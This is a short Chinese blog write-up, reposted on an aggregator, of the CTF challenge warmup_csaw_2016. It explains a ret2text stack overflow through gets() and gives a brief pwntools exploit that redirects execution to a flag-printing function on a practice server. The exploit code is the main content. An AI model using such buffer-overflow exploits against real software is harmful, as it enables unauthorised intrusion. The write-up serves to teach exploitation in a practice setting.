首页 > 其他 > 详细

003-warmup_csaw_2016

时间:2021-07-11 00:59:38      阅读:28      评论:0      收藏:0      [点我收藏+]

考点:ret2text

查看源代码

分析:倘若我们能控制执行流到sub_40060D()函数中,就可以打印出flag,而源代码中有危险函数gets()

技术分享图片

EXP

sub_40060D()函数的地址程序自己提供,且为固定的

技术分享图片

from pwn import *
context.arch = ‘amd64‘
#sh = process("./003-warmup_csaw_2016")
sh = remote("node4.buuoj.cn", 29898)
sys_addr = 0x40060d

sh.recv()
payload = flat(cyclic(0x40 + 8), sys_addr)
sh.send(payload)
sh.interactive()

技术分享图片

003-warmup_csaw_2016

原文:https://www.cnblogs.com/labster/p/14995327.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!